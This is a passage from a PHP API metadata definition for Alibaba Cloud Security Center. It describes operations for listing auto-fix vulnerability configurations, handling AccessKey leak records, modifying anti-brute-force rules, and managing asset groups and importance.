'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: **10**, which indicates that 10 auto-fix vulnerability configurations are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '100', 'minimum' => '1', 'default' => '20', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The configuration information of vulnerabilities that can be automatically fixed.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3B3F3A90-46A5-4023-A2D8-D68B14262F96', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'VulAutoRepairConfigList' => [ 'description' => 'The list of auto-fix vulnerability configurations.', 'type' => 'array', 'items' => [ 'description' => 'The auto-fix vulnerability configuration.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the auto-fix vulnerability configuration.', 'type' => 'integer', 'format' => 'int64', 'example' => '37338', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'anolisos:8.4:ANSA-2022:0001'."\n", 'title' => ''], 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)', 'title' => ''], 'Reason' => ['description' => 'The reason why the vulnerability can be automatically fixed.', 'type' => 'string', 'example' => 'The vulnerability fix is risk-free and can be configured to automate the fix.'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of auto-fix vulnerability configurations displayed per page in a paged query. Default value: **10**, which indicates that 10 auto-fix vulnerability configurations are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of auto-fix vulnerability configurations returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'Count' => ['description' => 'The number of auto-fix vulnerability configurations displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query auto-fix vulnerability configurations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVulAutoRepairConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListVulAutoRepairConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3B3F3A90-46A5-4023-A2D8-D68B14262F96\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"HttpStatusCode\\": 200,\\n \\"VulAutoRepairConfigList\\": [\\n {\\n \\"Id\\": 37338,\\n \\"Name\\": \\"anolisos:8.4:ANSA-2022:0001\\\\n\\",\\n \\"Type\\": \\"cve\\",\\n \\"AliasName\\": \\"RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)\\",\\n \\"Reason\\": \\"The vulnerability fix is risk-free and can be configured to automate the fix.\\\\n\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 11,\\n \\"Count\\": 10\\n }\\n}","type":"json"}]', ], 'ListVulGlobalConfig' => [ 'summary' => 'Queries the global configuration of vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'ConfigKey', 'in' => 'query', 'schema' => [ 'description' => 'The key of the configuration item. Valid values:'."\n" .'- **vul_scan_ip_list**: the collection of vulnerability scanning IP addresses.', 'enumValueTitles' => ['vul_scan_ip_list' => 'vul_scan_ip_list'], 'type' => 'string', 'required' => false, 'example' => 'vul_scan_ip_list', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F'], 'VulGlobalConfigList' => [ 'description' => 'The configurations.', 'type' => 'array', 'items' => [ 'description' => 'The configuration object.', 'type' => 'object', 'properties' => [ 'ConfigKey' => ['description' => 'The key of the configuration item.', 'type' => 'string', 'example' => 'vul_scan_ip_list', 'title' => ''], 'ConfigValue' => ['description' => 'The value of the configuration item.', 'type' => 'string', 'example' => '127.0.*.*,127.0.*.*', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query vulnerability global configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVulGlobalConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListVulGlobalConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"VulGlobalConfigList\\": [\\n {\\n \\"ConfigKey\\": \\"vul_scan_ip_list\\",\\n \\"ConfigValue\\": \\"127.0.*.*,127.0.*.*\\"\\n }\\n ]\\n}","type":"json"}]', ], 'MarkMonitorAccounts' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'AccountIds', 'in' => 'query', 'schema' => ['description' => 'The list of member account IDs.', 'type' => 'string', 'required' => true, 'example' => '131331822340XXXX,140649175187XXXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Tag member accounts in multi-account management', 'summary' => 'Tags member accounts in multi-account management. Tags selected member accounts as accounts of interest. Accounts of interest are displayed at the top of the drop-down list above the left-side navigation pane in the Security Center console.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'MarkMonitorAccounts'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:MarkMonitorAccounts', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\"\\n}","type":"json"}]', ], 'ModifyAccessKeyLeakDeal' => [ 'summary' => 'Handles an AccessKey pair leak record.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92345', 'abilityTreeNodes' => ['FEATUREsasVQUB1H'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the AccessKey pair leak record.'."\n" .'>Call the [DescribeAccesskeyLeakList](~~DescribeAccesskeyLeakList~~) operation to obtain this parameter. This parameter and the **IdList** parameter cannot both be empty.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The method to handle the AccessKey pair leak information. Valid values:'."\n" .'- **manual**: Manual handling.'."\n" .'- **disable**: Disable.'."\n" .'- **add-whitelist**: Add to whitelist.', 'type' => 'string', 'required' => true, 'example' => 'disable', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks for handling the AccessKey pair leak record.', 'type' => 'string', 'required' => false, 'example' => 'disabled.', 'title' => ''], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the AccessKey pair leak records.', 'type' => 'array', 'items' => ['description' => 'The ID of the AccessKey pair leak record.'."\n" .'>Call the [DescribeAccesskeyLeakList](~~DescribeAccesskeyLeakList~~) operation to obtain this parameter. This parameter and the **Id** parameter cannot both be empty.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'DD4617B4-133A-53C8-ADAE-7B30FF89****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Handle accessKey pair leak records', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAccessKeyLeakDeal'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAccessKeyLeakDeal', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DD4617B4-133A-53C8-ADAE-7B30FF89****\\"\\n}","type":"json"}]', ], 'ModifyAntiBruteForceRule' => [ 'summary' => 'Modifies a defense rule against brute-force attacks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the defense rule against brute-force attacks.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '65778', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the defense rule against brute-force attacks.', 'type' => 'string', 'required' => false, 'example' => 'TestRule', 'title' => ''], ], [ 'name' => 'Span', 'in' => 'query', 'schema' => ['description' => 'The threshold for the period of time during which logon failures are counted, in minutes. Valid values:'."\n" ."\n" .'- **1**: 1 minute'."\n" .'- **2**: 2 minutes'."\n" .'- **5**: 5 minutes'."\n" .'- **10**: 10 minutes'."\n" .'- **15**: 15 minutes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'FailCount', 'in' => 'query', 'schema' => ['description' => 'The threshold for the number of logon failures. Valid values:'."\n" ."\n" .'- **2**: 2 times'."\n" .'- **3**: 3 times'."\n" .'- **4**: 4 times'."\n" .'- **5**: 5 times'."\n" .'- **10**: 10 times'."\n" .'- **50**: 50 times'."\n" .'- **80**: 80 times'."\n" .'- **100**: 100 times.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'ForbiddenTime', 'in' => 'query', 'schema' => ['description' => 'The duration for which logon is prohibited, in minutes. Valid values:'."\n" ."\n" .'- **5**: 5 minutes'."\n" .'- **15**: 15 minutes'."\n" .'- **30**: 30 minutes'."\n" .'- **60**: 1 hour'."\n" .'- **120**: 2 hours'."\n" .'- **360**: 6 hours'."\n" .'- **720**: 12 hours'."\n" .'- **1440**: 24 hours'."\n" .'- **10080**: 7 days'."\n" .'- **52560000**: permanent (100 years).', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], [ 'name' => 'DefaultRule', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the defense rule against brute-force attacks is set as the default policy in Settings. Valid values:'."\n" ."\n" .'- **true**: The rule is set as the default policy.'."\n" ."\n" .'- **false**: The rule is not set as the default policy.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of servers to which the defense rule against brute-force attacks applies.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server to which the defense rule against brute-force attacks applies.', 'type' => 'string', 'required' => false, 'example' => 'b26c-3f4159dc****', 'title' => ''], 'required' => false, 'example' => 'uuid-13213-dasda', 'maxItems' => 10000, 'title' => '', ], ], [ 'name' => 'ProtocolType', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The protocol types that the defense rule against brute-force attacks supports for interception.', 'type' => 'object', 'properties' => [ 'Rdp' => ['description' => 'Specifies whether to enable RDP interception. This is enabled by default. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], 'Ssh' => ['description' => 'Specifies whether to enable SSH interception. This is enabled by default. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], 'SqlServer' => ['description' => 'Specifies whether to enable SqlServer interception. This is disabled by default. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'required' => false, 'example' => 'off', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760E840', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NotBuy', 'errorMessage' => 'user not buy service', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a defense rule against brute-force attacks', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAntiBruteForceRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAntiBruteForceRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AntiBruteForceRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:antibruteforcerule/{#AntiBruteForceRuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760E840\\"\\n}","type":"json"}]', ], 'ModifyAppVulScanCycle' => [ 'summary' => 'Configures a scan cycle for application vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '105958', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Cycle', 'in' => 'query', 'schema' => ['description' => 'The scan cycle for application vulnerabilities.'."\n" ."\n" .'* 1week'."\n" .'* 2weeks'."\n" .'* 3days'."\n", 'type' => 'string', 'required' => false, 'example' => '1week', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'AFEDC54D-70A2-5E56-A69B-E3D8AA8A5197', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyAppVulScanCycle', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAppVulScanCycle'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAppVulScanCycle', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"AFEDC54D-70A2-5E56-A69B-E3D8AA8A5197\\"\\n}","type":"json"}]', ], 'ModifyAssetCleanConfig' => [ 'summary' => 'Modifies the cleanup configuration for offline hosts. Only non-Alibaba Cloud hosts are supported.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '142958', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AssetCleanConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset cleanup configurations.', 'type' => 'array', 'items' => [ 'description' => 'The details of the asset cleanup configuration.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of host to clean up. Valid values:'."\n" ."\n" .'- **1**: non-Alibaba Cloud host.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'CleanDays' => ['description' => 'The number of offline days after which non-Alibaba Cloud hosts are automatically cleaned up. Valid values: integers from 1 to 30.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], 'Status' => ['description' => 'Specifies whether to enable automatic cleanup of offline non-Alibaba Cloud hosts. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '952776BD-5546-59FC-8AF3-B54EBAD57***', 'title' => ''], 'Data' => ['description' => 'The processing result. Valid values:'."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify offline host cleanup configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetCleanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAssetCleanConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"952776BD-5546-59FC-8AF3-B54EBAD57***\\",\\n \\"Data\\": true\\n}","type":"json"}]', ], 'ModifyAssetGroup' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '10.12.XX.XX', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the new group to which you want to assign the servers.'."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the group IDs of servers.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '9586199', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers whose group you want to modify. Separate multiple UUIDs with commas (,).'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.', 'type' => 'string', 'required' => true, 'example' => '076a446d-df7d-424c-bdc5-bb5dc7f1****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C2677612-7207-4AEB-BD48-8BA528F86777', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify an asset group', 'summary' => 'Modifies an asset group.', 'description' => 'Modifies the group of servers. You can use this operation to modify the group of one or more servers. After you create a group by calling the [CreateOrUpdateAssetGroup](~~CreateOrUpdateAssetGroup~~) operation, you can call this operation to modify the group of servers.'."\n" ."\n" .'### QPS limit'."\n" .'The single-user QPS limit for this operation is 10 calls per second. If the number of calls exceeds the limit, throttling is triggered, which may affect your business. Use this operation appropriately.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetGroup'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAssetGroup', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C2677612-7207-4AEB-BD48-8BA528F86777\\"\\n}","type":"json"}]', ], 'ModifyAssetImportant' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92348', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ImportantCode', 'in' => 'query', 'schema' => ['description' => 'The importance level. Valid values:'."\n" ."\n" .'- **0**: test'."\n" .'- **1**: normal'."\n" .'- **2**: important.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers. Separate multiple UUIDs with commas (,).'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '076a446d-df7d-424c-bdc5-bb5dc7f1****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'HttpStatusCode' => ['description' => 'The HTTP status code. A value of 200 indicates that the request was successful.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '23C85959-1540-514B-93CF-2992C53A1B4F', 'title' => ''], 'ErrCode' => ['description' => 'The error code returned if the call fails.', 'type' => 'string', 'example' => 'ServerError', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ErrMessage' => ['description' => 'The error message returned if the call fails.', 'type' => 'string', 'example' => 'ServerError', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set asset importance', 'summary' => 'Sets the importance level of assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetImportant'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyAssetImportant', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HttpStatusCode\\": 